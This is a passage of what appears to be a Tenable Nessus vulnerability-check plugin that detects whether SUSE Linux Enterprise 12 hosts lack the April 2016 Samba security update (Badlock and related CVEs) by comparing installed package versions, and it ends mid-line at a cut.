attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=973036\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=973832\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=974629\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-5370/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-2110/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-2111/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-2112/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-2113/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-2115/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-2118/\"\n );\n # https://www.suse.com/support/update/announcement/2016/suse-su-20161022-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?d433eabc\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Software Development Kit 12 :\n\nzypper in -t patch SUSE-SLE-SDK-12-2016-605=1\n\nSUSE Linux Enterprise Server 12 :\n\nzypper in -t patch SUSE-SLE-SERVER-12-2016-605=1\n\nSUSE Linux Enterprise High Availability 12 :\n\nzypper in -t patch SUSE-SLE-HA-12-2016-605=1\n\nSUSE Linux Enterprise Desktop 12 :\n\nzypper in -t patch SUSE-SLE-DESKTOP-12-2016-605=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libdcerpc-binding0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libdcerpc-binding0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libdcerpc0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libdcerpc0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libgensec0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libgensec0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-krb5pac0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-krb5pac0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-nbt0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-nbt0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-standard0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-standard0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libnetapi0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libnetapi0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libregistry0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libregistry0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-credentials0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-credentials0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-hostconfig0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-hostconfig0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-passdb0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-passdb0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-util0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-util0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamdb0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamdb0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbclient-raw0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbclient-raw0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbclient0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbclient0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbconf0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbconf0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbldap0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbldap0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libtevent-util0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libtevent-util0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libwbclient0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libwbclient0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-client-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-libs-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-winbind-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/04/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/04/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/04/15\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED12|SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED12 / SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP0\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED12\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED12 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libdcerpc-binding0-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libdcerpc-binding0-debuginfo-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libdcerpc0-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libdcerpc0-debuginfo-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libgensec0-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libgensec0-debuginfo-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libndr-krb5pac0-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libndr-krb5pac0-debuginfo-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libndr-nbt0-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libndr-nbt0-debuginfo-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libndr-standard0-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libndr-standard0-debuginfo-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libndr0-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libndr0-debuginfo-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libnetapi0-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libnetapi0-debuginfo-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libregistry0-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libregistry0-debuginfo-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libsamba-credentials0-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libsamba-credentials0-debuginfo-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libsamba-hostconfig0-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libsamba-hostconfig0-debuginfo-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libsamba-passdb0-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libsamba-passdb0-debuginfo-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libsamba-util0-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libsamba-util0-debuginfo-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libsamdb0-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libsamdb0-debuginfo-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libsmbclient-raw0-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libsmbclient-raw0-debuginfo-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libsmbclient0-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libsmbclient0-debuginfo-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libsmbconf0-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libsmbconf0-debuginfo-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libsmbldap0-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libsmbldap0-debuginfo-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libtevent-util0-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libtevent-util0-debuginfo-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libwbclient0-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libwbclient0-debuginfo-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"samba-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"samba-client-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"samba-client-debuginfo-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"samba-debuginfo-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"samba-debugsource-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"samba-libs-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"samba-libs-debuginfo-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"samba-winbind-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"samba-winbind-debuginfo-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libdcerpc-binding0-32bit-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libdcerpc-binding0-debuginfo-32bit-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libdcerpc0-32bit-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libdcerpc0-debuginfo-32bit-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libgensec0-32bit-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libgensec0-debuginfo-32bit-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libndr-krb5pac0-32bit-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libndr-krb5pac0-debuginfo-32bit-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libndr-nbt0-32bit-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libndr-nbt0-debuginfo-32bit-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libndr-standard0-32bit-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libndr-standard0-debuginfo-32bit-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libndr0-32bit-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libndr0-debuginfo-32bit-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libnetapi0-32bit-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libnetapi0-debuginfo-32bit-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libsamba-credentials0-32bit-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libsamba-credentials0-debuginfo-32bit-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libsamba-hostconfig0-32bit-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libsamba-hostconfig0-debuginfo-32bit-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libsamba-passdb0-32bit-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libsamba-passdb0-debuginfo-32bit-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libsamba-util0-32bit-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libsamba-util0-debuginfo-32bit-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libsamdb0-32bit-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libsamdb0-debuginfo-32bit-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libsmbclient-raw0-32bit-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libsmbclient-raw0-debuginfo-32bit-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libsmbclient0-32bit-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libsmbclient0-debuginfo-32bit-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libsmbconf0-32bit-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libsmbconf0-debuginfo-32bit-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libsmbldap0-32bit-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libsmbldap0-debuginfo-32bit-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libtevent-util0-32bit-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libtevent-util0-debuginfo-32bit-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libwbclient0-32bit-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libwbclient0-debuginfo-32bit-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"samba-32bit-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"samba-client-32bit-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"samba-client-debuginfo-32bit-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"samba-debuginfo-32bit-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"samba-libs-32bit-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"samba-libs-debuginfo-32bit-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"samba-winbind-32bit-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"samba-winbind-debuginfo-32bit-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libdcerpc-binding0-32bit-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libdcerpc-binding0-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libdcerpc-binding0-debuginfo-32bit-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libdcerpc-binding0-debuginfo-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libdcerpc0-32bit-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libdcerpc0-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libdcerpc0-debuginfo-32bit-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libdcerpc0-debuginfo-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libgensec0-32bit-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libgensec0-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libgensec0-debuginfo-32bit-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libgensec0-debuginfo-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libndr-krb5pac0-32bit-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libndr-krb5pac0-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libndr-krb5pac0-debuginfo-32bit-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libndr-krb5pac0-debuginfo-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libndr-nbt0-32bit-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libndr-nbt0-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libndr-nbt0-debuginfo-32bit-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libndr-nbt0-debuginfo-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libndr-standard0-32bit-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libndr-standard0-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libndr-standard0-debuginfo-32bit-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libndr-standard0-debuginfo-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libndr0-32bit-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libndr0-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libndr0-debuginfo-32bit-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libndr0-debuginfo-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libnetapi0-32bit-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libnetapi0-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libnetapi0-debuginfo-32bit-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libnetapi0-debuginfo-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libregistry0-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libregistry0-debuginfo-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libsamba-credentials0-32bit-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libsamba-credentials0-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libsamba-credentials0-debuginfo-32bit-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libsamba-credentials0-debuginfo-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libsamba-hostconfig0-32bit-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libsamba-hostconfig0-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libsamba-hostconfig0-debuginfo-32bit-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libsamba-hostconfig0-debuginfo-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libsamba-passdb0-32bit-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libsamba-passdb0-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libsamba-passdb0-debuginfo-32bit-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libsamba-passdb0-debuginfo-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libsamba-util0-32bit-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libsamba-util0-4.2.4-18.17.1\")) flag++;\nif (rpm_check(release:\"SLED12\", 